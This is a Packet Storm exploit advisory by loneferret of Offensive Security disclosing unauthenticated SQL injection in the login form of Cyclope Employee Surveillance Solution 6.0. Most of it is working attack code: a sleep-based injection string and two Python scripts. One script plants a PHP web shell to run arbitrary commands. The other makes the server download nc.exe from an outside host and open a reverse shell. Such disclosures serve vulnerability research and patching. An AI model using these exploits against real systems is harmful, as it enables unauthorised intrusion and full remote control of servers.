Cyclope Employee Surveillance Solution 6.0 SQL Injection

2012-08-09T00:00:00
ID PACKETSTORM:115406
Type packetstorm
Reporter loneferret
Modified 2012-08-09T00:00:00

Description

                                        
                                            `# Author: loneferret of Offensive Security  
# Product: Cyclope Employee Surveillance Solution v6.0  
# Version: 6.0  
# Vendor Site: http://www.cyclope-series.com/  
# Software Download: http://www.cyclope-series.com/download/index.html  
  
# Software description:  
# The employee monitoring software developed by Cyclope-Series is specially designed to inform  
# and equip management with statistics relating to the productivity of staff within their organization.  
  
# Vulnerability:  
# Due to improper input sensitization, many parameters are prone to SQL injection.  
# Most importantly, the username parameter in the application's login form.  
#  
  
  
  
# PoC 1:  
# MySql sleep for 5 seconds.  
# No Authentication Required.  
# Page: /index.php  
# Form: login  
# Vulnerable Parameter: username  
# username: x' or sleep(5) and '1'='1  
# password: whatever  
  
# As stated, nothing is checked before passing "username" to MySql.  
# This results in MySql sleeping for 5 seconds, and a unsuccessful  
# attempt.  
  
# PoC 2:  
# Remote Code Execution  
# No Authentication Required.  
# Page: /index.php  
# Form: login  
# Vulnerable Parameter: username  
  
# Creates a small php shell in the application's root folder.  
# It also has the added bonus of writing the administrator username and password  
# Side note:  
# This assumes a default installation. Which is located in "C:\Program Files\Cyclope\Ni4xLjA=\"  
# If you are wondering what is "Ni4xLjA=", well it's the software's version number in Base64 (6.1.0).  
# Using Owasp Zap, you can spider the site to find the application's root folder if ever it changes.  
  
----Python Script Simple Backdoor----  
#!/usr/bin/python  
  
import urllib, cookielib  
import urllib2  
import sys  
  
  
print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"  
print "[*] Vulnerability discovered by loneferret"  
  
print "[*] Offensive Security - http://www.offensive-security.com\n"  
if (len(sys.argv) != 3):  
print "[*] Usage: poc.py <RHOST> <CMD>"  
print "[*] Ex. : poc.py 127.0.0.1 ipconfig"  
exit(0)  
  
rhost = sys.argv[1]  
rcmd = sys.argv[2]  
  
backdoor = "<?php system($_GET['exe']);?>"  
  
prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "  
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')  
  
act = 'auth-login'  
pag = 'login'  
password = 'hole'  
  
cj = cookielib.CookieJar()  
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))  
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})  
print "[*] Sending evil payload"  
resp = opener.open("http://%s:7879/" % rhost, post_params)  
print "[*] Triggering backdoor"  
cmd = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost  
page = urllib.urlopen(cmd)  
print "[*] Executing command: %s\n" % rcmd  
shell = 'http://%s:7879/Ni4xLjA=/cmd.php?exe=%s' % (rhost,rcmd)  
try:  
page = urllib.urlopen(shell)  
cmd = page.read()  
print cmd  
except:  
print "[-] Oups! Somthing happened"  
  
  
  
  
---Python Getting Shell---  
#!/usr/bin/python  
  
import urllib, cookielib  
import urllib2  
import sys  
  
  
print "\n[*] Cyclope Employee Surveillance Solution v6.0 Remote Code Execution"  
print "[*] Vulnerability discovered by loneferret"  
  
print "[*] Offensive Security - http://www.offensive-security.com\n"  
if (len(sys.argv) != 2):  
print "[*] Usage: poc.py <RHOST>"  
exit(0)  
  
rhost = sys.argv[1]  
  
backdoor = '''<?php  
file_put_contents("nc.exe",  
file_get_contents("http://172.16.194.163/nc.exe"));  
shell_exec("nc.exe 172.16.194.163 4444 -e cmd.exe");?>'''  
  
prepayload = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/Ni4xLjA=/cmd.php' "  
prepayload += "LINES TERMINATED BY 0x%s) and '1'='1" % backdoor.encode('hex')  
  
act = 'auth-login'  
pag = 'login'  
password = 'hole'  
  
cj = cookielib.CookieJar()  
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))  
post_params = urllib.urlencode({'act' : act, 'pag' : pag, 'username' : prepayload, 'password' : password})  
print "[*] Sending evil payload"  
try:  
resp = opener.open("http://%s:7879/" % rhost, post_params)  
print "[*] Triggering Shell"  
shell = 'http://%s:7879/Ni4xLjA=/cmd.php' % rhost  
page = urllib.urlopen(shell)  
cmd = page.read()  
except:  
print "[-] Oups! Somthing happened"  
  
  
`